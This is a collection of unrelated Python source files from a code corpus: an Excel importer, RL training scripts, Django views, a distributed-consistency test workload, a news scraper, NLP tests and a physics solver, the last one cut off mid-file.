+{"seq_id":"229691064","text":"# -*- coding:utf8 -*-\n\n\n\"\"\"\n将 excel 文件导入到数据库表中\n\"\"\"\n\n\nimport xlrd\n\n\nclass FakeUser(object):\n\n def __init__(self, name, gender, avatar, location, follower, fans, weibo, intro, tag, education, career, open_id):\n self.name = name\n self.gender = gender\n self.avatar = avatar\n self.location = location\n self.follower = follower\n self.fans = fans\n self.weibo = weibo\n self.intro = intro\n self.tag = tag\n self.education = education\n self.career = career\n\n # fake 一个 openid 给 user\n self.open_id = open_id\n\n def __str__(self):\n return '%s: %s-%s-%s' % (self.open_id, self.name, self.gender, self.location)\n\n\ndef read_excel(excel_path='/root/workspace/excel/users.xlsx'):\n \"\"\"\n 读 excel 文件\n 注意: 到时候写入 fake user 的时候, 在 BaseUserInfo 的 extra_info 里面记录下这是个 fake 的 user --> 先检查下有没有执行过\n :param excel_path:\n :return:\n \"\"\"\n fake_users = []\n\n excel_object = xlrd.open_workbook(excel_path)\n table = excel_object.sheets()[0]\n\n nrows = table.nrows # 行数\n ncole = table.ncols # 列数\n\n fake_open_id = 1\n\n for i in range(1, nrows):\n row_values = table.row_values(i)\n fake_users.append(\n FakeUser(row_values[0], row_values[1], row_values[2], row_values[3], row_values[4], row_values[5],\n row_values[6], row_values[7], row_values[8], row_values[9], row_values[10], fake_open_id)\n )\n fake_open_id += 1\n\n print(\"user count: \", len(fake_users))\n return fake_users\n","sub_path":"commercial/util/excel_import.py","file_name":"excel_import.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"386558366","text":"from unityagents import UnityEnvironment\r\nimport numpy as np\r\nfrom ddpg_agent import Agent\r\nimport random\r\nimport torch\r\nfrom collections import deque\r\nimport matplotlib.pyplot as plt\r\n\r\nenv = UnityEnvironment(file_name=\"Tennis.exe\")\r\nbrain_name = env.brain_names[0]\r\nbrain = env.brains[brain_name]\r\nenv_info = env.reset(train_mode=True)[brain_name]\r\nnum_agents = len(env_info.agents)\r\nprint('Number of agents:', num_agents)\r\naction_size = brain.vector_action_space_size\r\nprint('Size of each action:', action_size)\r\nstates = env_info.vector_observations\r\nstate_size = states.shape[1]\r\nprint('There are {} agents. Each observes a state with length: {}'.format(states.shape[0], state_size))\r\nprint('The state for the first agent looks like:', states[0])\r\n\r\ndef ddpg(n_episodes=50000, max_t=3000):\r\n scores = []\r\n scores_window = deque(maxlen=100)\r\n for i_episode in range(1, n_episodes+1):\r\n env_info = env.reset(train_mode=True)[brain_name]\r\n states = env_info.vector_observations\r\n agent.reset()\r\n episode_score = np.zeros(num_agents)\r\n t=0\r\n while True:\r\n t+=1\r\n action=agent.act(states)\r\n env_info=env.step(action)[brain_name]\r\n next_state = env_info.vector_observations\r\n reward=env_info.rewards\r\n done=env_info.local_done\r\n agent.step(states[0], action[0], reward[0], next_state[0], done[0],t)\r\n agent.step(states[1], action[1], reward[1], next_state[1], done[1],t)\r\n states=next_state\r\n episode_score += reward\r\n if np.any(done):\r\n break\r\n max_score=np.max(episode_score)\r\n scores_window.append(max_score)\r\n scores.append(max_score)\r\n print('\\rEpisode {}\\tAvg. score: {:.2f}\\t'.format(i_episode, np.mean(scores_window), end=\"\"))\r\n if i_episode % 100 == 0:\r\n print('\\rEpisode {}\\tAvg. score: {:.2f}'.format(i_episode, np.mean(scores_window)))\r\n if np.mean(scores_window)>=0.5:\r\n print('\\nSolved in {:d} episodes.\\tAvg score: {:.2f}'.format(i_episode-100, np.mean(scores_window)))\r\n torch.save(agent.actor_local.state_dict(), 'checkpoint_actor.pth')\r\n torch.save(agent.critic_local.state_dict(), 'checkpoint_critic.pth')\r\n break\r\n return scores\r\n\r\nagent = Agent(state_size=state_size, action_size=action_size, random_seed=1)\r\nhistorized_scores = ddpg()\r\n\r\n# plot results:\r\nfig = plt.figure()\r\nax = fig.add_subplot(111)\r\nplt.plot(np.arange(1, len(historized_scores)+1), historized_scores)\r\nplt.ylabel('Score')\r\nplt.xlabel('Episode #')\r\nplt.show()\r\nenv.close()","sub_path":"Tennis.py","file_name":"Tennis.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"625237814","text":"from django.http import HttpResponse\nfrom flashcounter.game2010.models import Log, Result\nfrom datetime import datetime\nfrom django.db import connection\n\ndef event(request):\n event = Log(event=request.POST['event'], ctime=datetime.now())\t\n event.save()\n return HttpResponse(\"registred as #%s\" % event.id)\n\ndef result(request):\n result = Result(name=request.POST['name'], value=request.POST['value'], ctime=datetime.now())\t\n result.save()\n return HttpResponse(\"registred as #%s\" % result.id)\n\ndef daystat(request):\n cursor = connection.cursor()\n cursor.execute(\"select extract(year from ctime) as y, extract (month from ctime) as m, extract (day from ctime) as d, extract(hour from ctime) as h, event, count(*) from game2010_log where ctime > now() - interval '1 day' group by y, m, d, h, event order by y, m, d, h, event\")\n\n r = ''\n r+= ' Flashcounter - Last day statistics '\n r+= ' '\n r+= ' '\n r+= ' Date Hour of day Event count \\n'\n row = cursor.fetchone()\n while (row):\n r+= ' %s-%s-%s %s %s %s \\n' % (int(row[0]),int(row[1]),int(row[2]),int(row[3]), row[4], row[5])\n row = cursor.fetchone()\n r+= '
'\n r+= ' '\n r+= ''\n return HttpResponse(r)\n\n","sub_path":"flashcounter/game2010/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"202622374","text":"import time\nimport tqdm\nimport numpy as np\nimport collections\nfrom torch.utils.tensorboard import SummaryWriter\nfrom typing import Dict, List, Union, Callable, Optional\n\nfrom tianshou.data import Collector\nfrom tianshou.policy import BasePolicy\nfrom tianshou.utils import tqdm_config, MovAvg\nfrom tianshou.trainer import test_episode, gather_info\n\n\ndef offpolicy_trainer(\n policy: BasePolicy,\n train_collector,\n max_epoch: int,\n step_per_epoch: int,\n collect_per_step: int,\n batch_size: int,\n update_per_step: int = 1,\n train_fn: Optional[Callable[[int], None]] = None,\n writer: Optional[SummaryWriter] = None,\n log_interval: int = 1000,\n) -> int:\n \"\"\"A wrapper for off-policy trainer procedure. The ``step`` in trainer\n means a policy network update.\n\n :param policy: an instance of the :class:`~tianshou.policy.BasePolicy`\n class.\n :param train_collector: the collector used for training.\n :type train_collector: :class:`~tianshou.data.Collector`\n :param test_collector: the collector used for testing.\n :type test_collector: :class:`~tianshou.data.Collector`\n :param int max_epoch: the maximum of epochs for training. The training\n process might be finished before reaching the ``max_epoch``.\n :param int step_per_epoch: the number of step for updating policy network\n in one epoch.\n :param int collect_per_step: the number of frames the collector would\n collect before the network update. In other words, collect some frames\n and do some policy network update.\n :param episode_per_test: the number of episodes for one policy evaluation.\n :param int batch_size: the batch size of sample data, which is going to\n feed in the policy network.\n :param int update_per_step: the number of times the policy network would\n be updated after frames are collected, for example, set it to 256 means\n it updates policy 256 times once after ``collect_per_step`` frames are\n collected.\n :param function train_fn: a function receives the current number of epoch\n index and performs some operations at the beginning of training in this\n epoch.\n :param torch.utils.tensorboard.SummaryWriter writer: a TensorBoard\n SummaryWriter.\n :param int log_interval: the log interval of the writer.\n\n :return: See :func:`~tianshou.trainer.gather_info`.\n \"\"\"\n global_step = 0\n best_epoch, best_reward = -1, -1.\n stat = {}\n start_time = time.time()\n for epoch in range(1, 1 + max_epoch):\n # train\n policy.train()\n if train_fn:\n train_fn(epoch)\n with tqdm.tqdm(total=step_per_epoch, desc=f'Epoch #{epoch}',\n **tqdm_config) as t:\n results = collections.deque(maxlen=100)\n while t.n < t.total:\n assert train_collector.policy == policy\n result = train_collector.collect(n_step=collect_per_step)\n results.extend([result])\n data = {}\n for i in range(update_per_step * min(\n min(100, result['n/st']) // collect_per_step, t.total - t.n)):\n losses = policy.update(batch_size, train_collector.buffer)\n global_step += collect_per_step\n for k in result.keys():\n data[k] = f'{result[k]:.2f}'\n if writer and global_step % log_interval == 0:\n writer.add_scalar('train/' + k, np.mean([r[k] for r in results]),\n global_step=global_step)\n for k in losses.keys():\n if stat.get(k) is None:\n stat[k] = MovAvg()\n stat[k].add(losses[k])\n data[k] = f'{stat[k].get():.6f}'\n if writer and global_step % log_interval == 0:\n writer.add_scalar(\n k, stat[k].get(), global_step=global_step)\n data['exp_noise'] = policy._noise._sigma\n t.update(1)\n t.set_postfix(**data)\n if t.n <= t.total:\n t.update()\n return global_step\n","sub_path":"continuous/offpolicy.py","file_name":"offpolicy.py","file_ext":"py","file_size_in_byte":4322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"651263091","text":"import numpy as np\nfrom scipy.stats import norm\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport elice_utils\n\ndef read_input():\n\tm, s = [int(x) for x in input().split()]\n\treturn m, s\n\ndef generate_samples(m, s):\n\treturn np.random.normal(m, s, 1000)\n\ndef plotting(samples, m, s):\n\tcount, bins, ignored = plt.hist(samples, 30, normed=True)\n\tplt.plot(bins, norm.pdf(bins, m, s), linewidth=2, color='r')\n\tplt.xlabel(\"X\", fontsize=20)\n\tplt.ylabel(\"P(X)\", fontsize=20)\n\tplt.xlim(0, 100)\n\tplt.savefig(\"normal_samples.png\")\n\telice_utils.send_image(\"normal_samples.png\")\n\tplt.close()\n\n\treturn\n\ndef main():\n\tm, s = read_input()\n\tsamples = generate_samples(m, s)\n\tplotting(samples, m, s)\n\treturn\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"6. 데모/[3주차] Unsupervised Learning/단변량 정규분포에서 표본 추출/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"91095560","text":"# imports neccessary modules\nfrom .catan_game import CatanGame\nfrom .catan_statuses import CatanStatuses\n\n# creates a new game of Catan\ngame = CatanGame()\n\n# Do for each player twice:\nfor i in range(2 * len(game.players)):\n\n # saves the player's number as p\n p = i % 3\n\n has_error = True\n while (has_error):\n\n # ask them to build a settlement\n print((\"Player %s, where do you want to build your first settlement?\" % (p + 1)))\n r = int(eval(input(\"Enter the row:\")))\n i = int(eval(input(\"Enter the index: \")))\n \n # try to place the settlement\n status = game.add_settlement(player=p, r=r, i=i, is_starting=True)\n \n \t# if it didn't work, tell them why and try again\n if status != CatanStatuses.ALL_GOOD:\n \n # figure out what went wrong\n if status == CatanStatuses.ERR_BLOCKED:\n print(\"That settlement position is to close to another settlement\")\n \n elif status == CatanStatuses.ERR_BAD_POINT:\n print(\"That settlement position doesn't exist!\")\n \t\t\t\n else:\n print((\"An unexpected error occured: %s\" % status))\n \n else:\n print(\"Successfully built a settlement\")\n has_error = False\n \n \n # get all the possible places a road could go from their settlement\n \n # get them to choose one\n \n # try to build the road\n \n # if it didn't work, try again","sub_path":"PyCatan/catan.py","file_name":"catan.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"611295678","text":"from django.db.models import FloatField, Func, Value\n\n\nclass TrigramWordSimilarity(Func):\n output_field = FloatField()\n function = 'WORD_SIMILARITY'\n\n def __init__(self, expression, string, **extra):\n if not hasattr(string, 'resolve_expression'):\n string = Value(string)\n super().__init__(string, expression, **extra)\n\n\nclass LogAge(Func):\n \"\"\"Calculate log 2 of days since datetime column\"\"\"\n # Minimum age 1 day. Prevent log of zero error and unintended large\n # effect of log of very small inputs.\n output_field = FloatField()\n\n template = (\n f'greatest(1.0, log(2::numeric, ('\n 'abs(extract(epoch FROM (TIMESTAMP '\n \"'%(when)s' - \"\n 'COALESCE(%(table)s.%(timefield)s,%(table)s.created)'\n '))) / (60 * 60 * 24))::numeric'\n '))'\n )\n\n # greatest(1.0, log(2, number))\n # return at least 1.0 to avoid zero division or very skewed results\n # for logs close to zero\n\n # abs(extract(epoch FROM (when - then)))\n # Extract total seconds in timedelta `now - then`\n # `epoch` = 1970-01-01 = unix epoch = total seconds\n\n # / (60 * 60 * 24)\n # Divide by minutes and seconds and hours: seconds -> days\n\n # ::numeric\n # Cast result as `numeric` using PostgreSQL type cast notation\n # `numeric` = decimal type\n","sub_path":"django/utils/dbfuncs.py","file_name":"dbfuncs.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"538864451","text":"# Copyright 2020 Vectorized, Inc.\n#\n# Use of this software is governed by the Business Source License\n# included in the file licenses/BSL.md\n#\n# As of the Change Date specified in that file, in accordance with\n# the Business Source License, use of this software will be governed\n# by the Apache License, Version 2.0\n\nimport asyncio\nimport uuid\nimport random\nimport sys\nimport json\nimport logging\nimport traceback\nfrom collections import defaultdict\n\nfrom gobekli.kvapi import RequestCanceled, RequestTimedout, RequestViolated\nfrom gobekli.consensus import Violation\nfrom gobekli.workloads.common import (AvailabilityStatLogger, Stat,\n LinearizabilityHashmapChecker)\nfrom gobekli.logging import (m, log_latency)\n\ncmdlog = logging.getLogger(\"gobekli-cmd\")\n\n\nclass MWClient:\n def __init__(self, started_at, stat, checker, node, key):\n self.started_at = started_at\n self.stat = stat\n self.node = node\n self.checker = checker\n self.key = key\n self.last_write_id = str(uuid.uuid1())\n self.last_version = 0\n\n async def act(self):\n loop = asyncio.get_running_loop()\n prev_write_id = self.last_write_id\n curr_write_id = str(uuid.uuid1())\n curr_version = self.last_version + 1\n read_id = str(uuid.uuid1())\n\n op_started = None\n try:\n self.stat.assign(\"size\", self.checker.size())\n\n cmdlog.info(\n m(type=\"write_stared\",\n node=self.node.name,\n key=self.key,\n write_id=curr_write_id,\n read_id=read_id,\n prev_write_id=prev_write_id,\n version=curr_version,\n value=f\"42:{curr_version}\").with_time())\n\n self.checker.read_started(read_id, self.key)\n self.checker.cas_started(curr_write_id, self.key, prev_write_id,\n curr_version, f\"42:{curr_version}\")\n op_started = loop.time()\n response = await self.node.cas_aio(self.key, prev_write_id,\n f\"42:{curr_version}\",\n curr_write_id)\n data = response.record\n op_ended = loop.time()\n log_latency(\"ok\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx, response.metrics)\n cmdlog.info(\n m(type=\"write_ended\",\n node=self.node.name,\n key=self.key,\n write_id=data.write_id,\n value=data.value).with_time())\n if data.write_id == curr_write_id:\n self.checker.cas_ended(curr_write_id, self.key)\n else:\n self.checker.cas_canceled(curr_write_id, self.key)\n self.checker.read_ended(read_id, self.key, data.write_id,\n data.value)\n\n read_version = int(data.value.split(\":\")[1])\n self.last_write_id = data.write_id\n\n if self.last_version < read_version:\n self.last_version = read_version\n\n self.stat.inc(self.node.name + \":ok\")\n self.stat.inc(\"all:ok\")\n except RequestTimedout:\n try:\n self.stat.inc(self.node.name + \":out\")\n op_ended = loop.time()\n log_latency(\"out\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n cmdlog.info(\n m(type=\"write_timedout\",\n node=self.node.name,\n write_id=curr_write_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n self.checker.cas_timeouted(curr_write_id, self.key)\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on write/timedout\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestCanceled:\n try:\n self.stat.inc(self.node.name + \":err\")\n op_ended = loop.time()\n log_latency(\"err\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n cmdlog.info(\n m(type=\"write_canceled\",\n node=self.node.name,\n write_id=curr_write_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n try:\n self.checker.cas_canceled(curr_write_id, self.key)\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n write_id=curr_write_id).with_time())\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on write/canceled\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestViolated as e:\n try:\n self.checker.report_violation(\"internal violation: \" +\n json.dumps(e.info))\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n write_id=curr_write_id).with_time())\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n write_id=curr_write_id).with_time())\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on write\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n\n\nclass MRClient:\n def __init__(self, started_at, stat, checker, node, key):\n self.started_at = started_at\n self.stat = stat\n self.node = node\n self.key = key\n self.checker = checker\n\n async def act(self):\n loop = asyncio.get_running_loop()\n op_started = None\n read_id = str(uuid.uuid1())\n try:\n self.stat.assign(\"size\", self.checker.size())\n cmdlog.info(\n m(type=\"read_started\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_started(read_id, self.key)\n op_started = loop.time()\n response = await self.node.get_aio(self.key, read_id)\n read = response.record\n op_ended = loop.time()\n log_latency(\"ok\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx, response.metrics)\n if read == None:\n cmdlog.info(\n m(type=\"read_404\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_none(read_id, self.key)\n else:\n cmdlog.info(\n m(type=\"read_ended\",\n node=self.node.name,\n read_id=read_id,\n key=self.key,\n write_id=read.write_id,\n value=read.value).with_time())\n self.checker.read_ended(read_id, self.key, read.write_id,\n read.value)\n self.stat.inc(self.node.name + \":ok\")\n self.stat.inc(\"all:ok\")\n except RequestTimedout:\n try:\n op_ended = loop.time()\n log_latency(\"out\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n self.stat.inc(self.node.name + \":out\")\n cmdlog.info(\n m(type=\"read_timedout\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on read/timedout\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestCanceled:\n try:\n op_ended = loop.time()\n log_latency(\"err\", op_ended - self.started_at,\n op_ended - op_started, self.node.idx)\n self.stat.inc(self.node.name + \".err\")\n cmdlog.info(\n m(type=\"read_canceled\",\n node=self.node.name,\n read_id=read_id,\n key=self.key).with_time())\n self.checker.read_canceled(read_id, self.key)\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on read/canceled\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n except RequestViolated as e:\n try:\n self.checker.report_violation(\"internal violation: \" +\n json.dumps(e.info))\n except Violation as e:\n cmdlog.info(\n m(e.message,\n type=\"linearizability_violation\",\n read_id=read_id).with_time())\n except Violation as e:\n cmdlog.info(\n m(e.message, type=\"linearizability_violation\",\n read_id=read_id).with_time())\n except:\n e, v = sys.exc_info()[:2]\n cmdlog.info(\n m(\"unexpected error on read\",\n error_type=str(e),\n error_value=str(v),\n stacktrace=traceback.format_exc()).with_time())\n self.checker.abort()\n\n\nclass ValidationResult:\n def __init__(self, is_valid, error):\n self.is_valid = is_valid\n self.error = error\n\n\nclass COMRMWWorkload:\n def __init__(self, period_s, kv_nodes, numOfKeys, numOfReaders,\n ss_metrics):\n self.kv_nodes = kv_nodes\n self.period_s = period_s\n self.numOfKeys = numOfKeys\n self.numOfReaders = numOfReaders\n self.ss_metrics = ss_metrics\n self.is_active = True\n self.validation_result = None\n self.availability_logger = None\n\n def stop(self):\n self.is_active = False\n\n async def dispose(self):\n for kv_node in self.kv_nodes:\n await kv_node.close_aio()\n\n async def start(self):\n keys = list(map(lambda x: f\"key{x}\", range(0, self.numOfKeys)))\n\n checker = LinearizabilityHashmapChecker()\n\n for key in keys:\n wasSet = False\n for kv in self.kv_nodes:\n try:\n await kv.put_aio(key, \"42:0\", \"0\")\n checker.init(\"0\", key, 0, \"42:0\")\n wasSet = True\n break\n except:\n pass\n if not wasSet:\n self.is_active = False\n raise Exception(\"all kv_nodes rejected init write\")\n\n stat = Stat()\n dims = []\n dims.append(\"all:ok\")\n for kv in self.kv_nodes:\n dims.append(kv.name + \":ok\")\n dims.append(kv.name + \":out\")\n dims.append(kv.name + \":err\")\n dims.append(\"size\")\n self.availability_logger = AvailabilityStatLogger(stat, dims)\n clients = []\n tasks = []\n\n tasks.append(asyncio.create_task(self.availability_logger.start()))\n\n loop = asyncio.get_running_loop()\n started_at = loop.time()\n\n clients_by_endpoint = defaultdict(lambda: [])\n\n for key in keys:\n for kv in self.kv_nodes:\n mwclient = MWClient(started_at, stat, checker, kv, key)\n clients_by_endpoint[kv.address].append(mwclient)\n for _ in range(0, self.numOfReaders):\n mrclient = MRClient(started_at, stat, checker, kv, key)\n clients_by_endpoint[kv.address].append(mrclient)\n\n clients_groups = list(clients_by_endpoint.values())\n group_idx = 0\n while checker.is_valid and (not checker.is_aborted) and self.is_active:\n clients = clients_groups[group_idx]\n group_idx = (group_idx + 1) % len(clients_groups)\n\n i = random.randint(0, len(clients) - 1)\n client = clients[i]\n # TODO: keep track of tasks and wait them in the end\n _ = asyncio.create_task(client.act())\n await asyncio.sleep(self.period_s)\n\n self.validation_result = ValidationResult(checker.is_valid,\n checker.error)\n self.is_active = False\n\n self.availability_logger.stop()\n for task in tasks:\n await task\n\n return self.validation_result\n\n\nasync def start_comrsw_workload_aio(kv_nodes, numOfKeys, numOfReaders, timeout,\n ss_metrics):\n print(\"comrsw\")\n workload = COMRMWWorkload(1.0 / 400, kv_nodes, numOfKeys, numOfReaders,\n ss_metrics)\n task = asyncio.create_task(workload.start())\n\n loop = asyncio.get_running_loop()\n end_time = loop.time() + timeout\n while workload.is_active:\n if (loop.time() + 2) >= end_time:\n workload.stop()\n break\n await asyncio.sleep(2)\n\n result = await task\n await workload.dispose()\n print(result.is_valid)\n print(result.error)\n","sub_path":"src/consistency-testing/gobekli/gobekli/workloads/symmetrical_comrmw.py","file_name":"symmetrical_comrmw.py","file_ext":"py","file_size_in_byte":14466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"537203152","text":"import gym\nimport numpy as np\nfrom tqdm import tqdm\nfrom q_learning import learn_episode, play_episode\nfrom DQNSolver import DQNSolver\nfrom plotting import plot_avg_sparse_normal, plot_histogram\n\n\ndef main():\n\t# hyper params\n\tnum_learn_episodes = 1000\n\tnum_play_episodes = 1000\n\tepsilon = 1\n\teps_min = 0.1\n\teps_decay = (epsilon - eps_min) / num_learn_episodes * 4\n\treplay_memory_size = 100\n\tminibatch_size = 32\n\n\t# init\n\tenv = gym.make('CartPole-v1')\n\tdqn_solver = DQNSolver(env, replay_memory_size)\n\treward_memory_learn = np.array([])\n\treward_memory_play = np.array([])\n\n\t# Q-learning\n\tfor _ in tqdm(range(num_learn_episodes)):\n\t\ttotal_reward, dqn_solver, epsilon = learn_episode(\n\t\t\tdqn_solver=dqn_solver,\n\t\t\tenv=env,\n\t\t\tepsilon=epsilon,\n\t\t\tepsilon_min=eps_min,\n\t\t\tepsilon_decay=eps_decay,\n\t\t\tminibatch_size=minibatch_size\n\t\t)\n\t\treward_memory_learn = np.append(reward_memory_learn, total_reward)\n\n\t# playing\n\tfor _ in tqdm(range(num_play_episodes)):\n\t\ttotal_reward = play_episode(env, dqn_solver)\n\t\treward_memory_play = np.append(reward_memory_play, total_reward)\n\n\t# plotting\n\tplot_avg_sparse_normal(reward_memory_learn, num_learn_episodes)\n\tplot_histogram(reward_memory_play, num_learn_episodes)\n\n\t# saving the model parameters\n\tmodel = dqn_solver.get_model()\n\tmodel.save_weights('models/cartpole_model_weights_{}.h5'.format(num_learn_episodes))\n\tmodel.save('models/cartpole_model_{}.h5'.format(num_learn_episodes))\n\n\nif __name__ == '__main__':\n\tmain()\n","sub_path":"cartpole.py","file_name":"cartpole.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"620613733","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nfrom datetime import datetime\r\n\r\nr = requests.get('https://www.bloomberg.com/asia')\r\n\r\nsoup = BeautifulSoup(r.text, 'html.parser')\r\n\r\n#results_1 = soup.find_all('section', attrs={'class':'single-story-module__eyebrow'})\r\nresults_2 = soup.find_all('article', attrs={'data-type':'article'})\r\n\r\nrecords = []\r\n\r\n#Concat bloomberg since headline is missing\r\nfor result in results_2:\r\n date = result.find('time')['datetime'][0:-8]\r\n url = 'www.bloomberg.com' + result.find('a')['href']\r\n records.append((date, url))\r\n\r\n\r\ndf = pd.DataFrame(records, columns=['Date','Url'])\r\ndf['Date'] = pd.to_datetime(df['Date'])\r\ndf.sort_values(by='Date', ascending=False)\r\n\r\ndf.to_csv('Bloomberg.csv', index = False, encoding = 'utf-8')\r\n\r\n","sub_path":"Bloomberg.py","file_name":"Bloomberg.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"219756353","text":"from nlp_profiler.core import gather_duplicates, count_duplicates # noqa\n\ntext_with_a_number = '2833047 people live in this area'\ntext_with_duplicates = 'Everyone here is so hardworking. hardworking people. ' \\\n 'I think hardworking people are a good trait in our company'\n\n\ndef test_given_a_text_with_no_duplicates_when_parsed_then_return_empty():\n # given\n expected_results = {}\n\n # when\n actual_results = gather_duplicates(text_with_a_number)\n\n # then\n assert expected_results == actual_results, \\\n \"Should have NOT found duplicates in the text\"\n\n\ndef test_given_a_text_with_duplicates_when_parsed_then_return_the_duplicates():\n # given\n expected_results = {'.': 2, 'hardworking': 3, 'people': 2}\n\n # when\n actual_results = gather_duplicates(text_with_duplicates)\n\n # then\n assert expected_results == actual_results, \\\n \"Should have found multiple duplicates in the text\"\n\n\ndef test_given_a_text_with_duplicates_when_counted_then_return_the_duplicates_count():\n # given, when\n actual_results = count_duplicates(text_with_a_number)\n\n # then\n assert actual_results == 0, \\\n \"Should have NOT found duplicates in the text\"\n\n # given, when\n actual_results = count_duplicates(text_with_duplicates)\n\n # then\n assert actual_results == 3, \\\n \"Should have found a few duplicates in the text\"\n","sub_path":"tests/granular/test_duplicates.py","file_name":"test_duplicates.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"12112139","text":"r\"\"\"A Cog12 solver in Python.\n\nThis is a pure Python implementation of the Cog12 solution using Numpy.\nThe exact solution takes the form,\n\n.. math::\n\n \\rho(r,t) &= \\rho_0 \\, r^{-2k/(\\gamma + 1)}\n \\\\\n u(r,t) &=u_0 \\, r^{k(1 - \\gamma)/(1 + \\gamma)}\n \\\\\n T(r,t) &= \\frac{u_o^2\\, (1 - \\gamma)}{2 \\Gamma \\gamma}\n \\cdot\n r^{2 k (1 - \\gamma)/(1 + \\gamma)}\n \\\\ \n \\alpha &= (\\beta + 4)(1 - \\gamma) + \\frac{(k -1)(\\gamma + 1)}{2k}\n ~~(k \\ne 0)\n\nFree parameters: :math:`k`, :math:`\\rho_0`, :math:`u_0`, :math:`\\gamma`,\n:math:`\\Gamma`, and :math:`\\beta` (with :math:`\\alpha` a function of\n:math:`k`, :math:`\\beta`, and :math:`\\gamma`). Note that :math:`T > 0`\nonly when :math:`\\gamma < 1`.\n\n\"\"\"\n\nimport numpy as np\n\nfrom ...base import ExactSolver, ExactSolution\n\n\nclass Cog12(ExactSolver):\n \"\"\"Computes the solution to the Cog12 problem.\n\n Computes the solution to the Cog12 problem with defaults geometry = 3,\n gamma = 1.4, beta = 1.0, rho0 = 1.8, u0 = 2.3, Gamma = 40.\n \"\"\"\n\n parameters = {\n 'geometry': \"2=cylindrical, 3=spherical\",\n 'gamma': r\"specific heat ratio :math:`\\gamma \\equiv c_p/c_v`\",\n 'beta': r\"dimensionless constant :math:`\\beta` in Eq. :eq:`lambdaDef`\",\n 'rho0': \"density coefficient\",\n 'u0': \"velocity coefficient\",\n 'Gamma': \"|Gruneisen| gas parameter\",\n }\n geometry = 3\n gamma = 1.4\n beta = 1.0\n rho0 = 1.8\n u0 = 2.3\n Gamma = 40.\n \n def __init__(self, **kwargs):\n\n super(Cog12, self).__init__(**kwargs)\n\n if self.geometry not in [2, 3]:\n raise ValueError(\"geometry must be 2, or 3\")\n\n if self.gamma >= 1:\n print(\"*** warning: gamma > 1 gives T < 0 ***\")\n if self.beta < 1.0 or self.beta > 3.0:\n print(\"*** warning: beta lies outside range [1,3] ***\")\n \n def _run(self, r, t):\n\n bigGamma = self.Gamma\n k = self.geometry - 1.\n\n c1 = -2 * k / (self.gamma + 1)\n c2 = k * (1 - self.gamma) / (1 + self.gamma)\n c3 = 2 - (self.gamma - 1) * (k + 1)\n temp0 = pow(self.u0, 2) * (1 - self.gamma) / \\\n (2 * bigGamma * self.gamma)\n\n alpha = (self.beta + 4) * (1 + self.gamma) + (k - 1) / c3\n if alpha < -2.0 or alpha > -1.0:\n print(\"*** warning: alpha lies outside range [-2,-1] ***\")\n\n# a = 7.5657e-15 erg cm^-3 K^-4\n# = 1.3720e+02 erg cm^-3 ev^-4 using k_B = 8.6173324e-5 eV K^-1\n\n density = self.rho0 * pow(r, c1) * np.ones(shape=r.shape)\n velocity = self.u0 * pow(r, c2) * np.ones(shape=r.shape)\n temperature = temp0 * pow(r, 2 * c2) 